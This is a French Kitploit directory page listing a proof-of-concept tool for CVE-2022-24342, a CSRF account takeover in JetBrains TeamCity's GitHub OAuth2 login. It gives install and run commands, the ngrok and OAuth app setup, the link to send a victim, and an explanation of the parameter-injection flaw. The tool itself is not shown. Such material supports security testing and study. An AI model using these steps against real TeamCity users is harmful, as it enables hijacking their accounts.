Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-24342 — PoC pour CVE-2022-24342 : prise de contrôle de compte via CSRF dans l'authentification GitHub | Kitploit
Outils/GitHubGitHub/yuriisanin/cve-2022-24342
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationRed Teaming
GitHubyuriisanin/cve-2022-24342

CVE-2022-24342

PoC pour CVE-2022-24342 : prise de contrôle de compte via CSRF dans l'authentification GitHub

Voir le dépôt
3772il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-24342

JetBrains TeamCity - détournement de compte via CSRF dans l'authentification GitHub (PoC)

  • CVE-2022-24342
    • Requirements
    • Usage
    • How does it work?
      • GitHub OAuth2: query parameters processing order
      • CVE-2022-24342: HTTP requests flow

Prérequis

  • JetBrains TeamCity <2021.2.1
  • Authentification GitHub activée

Utilisation

  1. Essayez de vous connecter avec le compte GitHub de l'attaquant sur l'instance TeamCity cible afin que l'application GitHub de TeamCity soit autorisée.

  2. Installez et exécutez :

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-24342
$ cd CVE-2022-24342/
$ pip3 install -r requirements.txt
$ python3 exploit.py -h

usage: exploit.py [-h] -s S [-p P]

optional arguments:
  -h, --help  show this help message and exit
  -s S        GitHub user session
  -p P        Uvicorn port

$ python3 exploit.py -s {attackers_github_session_cookie}

Si vous exécutez l'exploit sur la machine locale, vous devrez peut-être utiliser Ngrok ou des alternatives.

root@kitploit:~
$ ngrok http 8000
  1. Créez une application GitHub OAuth2 :
root@kitploit:~
homepage: "http://{exploit-host}:8000"
authorization callback url: "http://{exploit-host}:8000/callback"
  1. Envoyez le lien suivant à une victime :
root@kitploit:~
http://{exploit-host}:8000/exploit?target_host=http://{target-host}&gh_client_id={github_oauth_client_id}

DÉMO :

CVE-2022-24342 Demo

Comment cela fonctionne ?

TeamCity était vulnérable à l'injection de paramètres de requête lors du flux OAuth2, permettant à un attaquant de rediriger l'utilisateur vers une application GitHub OAuth2 arbitraire, d'intercepter un paramètre d'état valide et de connecter un compte GitHub arbitraire au compte TeamCity de la victime.

Cela était possible grâce aux éléments suivants :

  • Ordre de traitement des paramètres de requête GitHub OAuth2
  • Injection de paramètres de requête TeamCity

GitHub OAuth2 : ordre de traitement des paramètres de requête

github-oauth-parameters-processing

CVE-2022-24342 : flux des requêtes HTTP

requests-flow

Support

Vous pouvez me suivre sur Twitter, GitHub ou YouTube.

Télécharger l’outil